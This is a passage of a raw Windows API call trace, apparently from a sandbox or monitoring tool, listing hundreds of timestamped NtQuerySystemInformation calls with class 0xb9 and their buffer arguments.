SystemInformation=0xc751dfcba0, Length=0x38, ResultLength=0x0) [0269.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9d0, Length=0x28, ResultLength=0x0) [0269.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9d0, Length=0x28, ResultLength=0x0) [0269.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9d0, Length=0x28, ResultLength=0x0) [0269.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca40, Length=0x28, ResultLength=0x0) [0269.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcba0, Length=0x38, ResultLength=0x0) [0269.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcac0, Length=0x28, ResultLength=0x0) [0269.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcac0, Length=0x28, ResultLength=0x0) [0269.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcba0, Length=0x38, ResultLength=0x0) [0269.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca20, Length=0x20, ResultLength=0x0) [0269.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x20, ResultLength=0x0) [0269.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x20, ResultLength=0x0) [0269.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9a0, Length=0x20, ResultLength=0x0) [0269.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcba0, Length=0x38, ResultLength=0x0) [0269.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca20, Length=0x20, ResultLength=0x0) [0269.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9b0, Length=0x20, ResultLength=0x0) [0269.493] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9b0, Length=0x20, ResultLength=0x0) [0269.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8a0, Length=0x50, ResultLength=0x0) [0269.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8a0, Length=0x50, ResultLength=0x0) [0269.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8a0, Length=0x50, ResultLength=0x0) [0269.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x50, ResultLength=0x0) [0269.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x50, ResultLength=0x0) [0269.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x50, ResultLength=0x0) [0269.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x50, ResultLength=0x0) [0269.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x38, ResultLength=0x0) [0269.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x28, ResultLength=0x0) [0269.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x28, ResultLength=0x0) [0269.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x28, ResultLength=0x0) [0269.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x28, ResultLength=0x0) [0269.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x28, ResultLength=0x0) [0269.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x38, ResultLength=0x0) [0269.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.498] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x28, ResultLength=0x0) [0269.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5e0, Length=0x28, ResultLength=0x0) [0269.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc480, Length=0x20, ResultLength=0x0) [0269.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc400, Length=0x20, ResultLength=0x0) [0269.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc400, Length=0x20, ResultLength=0x0) [0269.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc400, Length=0x20, ResultLength=0x0) [0269.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x38, ResultLength=0x0) [0269.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6c0, Length=0x38, ResultLength=0x0) [0269.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x20, ResultLength=0x0) [0269.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4d0, Length=0x20, ResultLength=0x0) [0269.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4d0, Length=0x20, ResultLength=0x0) [0269.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcaf0, Length=0x50, ResultLength=0x0) [0269.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcaf0, Length=0x50, ResultLength=0x0) [0269.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcaf0, Length=0x50, ResultLength=0x0) [0269.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9e0, Length=0x50, ResultLength=0x0) [0269.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9e0, Length=0x50, ResultLength=0x0) [0269.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9e0, Length=0x50, ResultLength=0x0) [0269.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.504] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9e0, Length=0x50, ResultLength=0x0) [0269.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.505] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x38, ResultLength=0x0) [0269.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0269.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0269.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.513] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0269.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x28, ResultLength=0x0) [0269.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x38, ResultLength=0x0) [0269.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.514] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x28, ResultLength=0x0) [0269.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x28, ResultLength=0x0) [0269.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x38, ResultLength=0x0) [0269.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0269.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0269.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0269.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0269.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x38, ResultLength=0x0) [0269.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0269.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x20, ResultLength=0x0) [0269.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x20, ResultLength=0x0) [0269.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcaf0, Length=0x50, ResultLength=0x0) [0269.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcaf0, Length=0x50, ResultLength=0x0) [0269.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcaf0, Length=0x50, ResultLength=0x0) [0269.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9e0, Length=0x50, ResultLength=0x0) [0269.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9e0, Length=0x50, ResultLength=0x0) [0269.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9e0, Length=0x50, ResultLength=0x0) [0269.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc9e0, Length=0x50, ResultLength=0x0) [0269.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x38, ResultLength=0x0) [0269.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0269.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0269.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc740, Length=0x28, ResultLength=0x0) [0269.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x28, ResultLength=0x0) [0269.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x38, ResultLength=0x0) [0269.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.523] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x28, ResultLength=0x0) [0269.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.525] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc830, Length=0x28, ResultLength=0x0) [0269.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x38, ResultLength=0x0) [0269.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0269.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0269.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0269.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x20, ResultLength=0x0) [0269.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc910, Length=0x38, ResultLength=0x0) [0269.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc790, Length=0x20, ResultLength=0x0) [0269.526] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x20, ResultLength=0x0) [0269.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc720, Length=0x20, ResultLength=0x0) [0269.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.527] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0269.527] NtQuerySystemInformation (SystemInformationClass=0xb9, 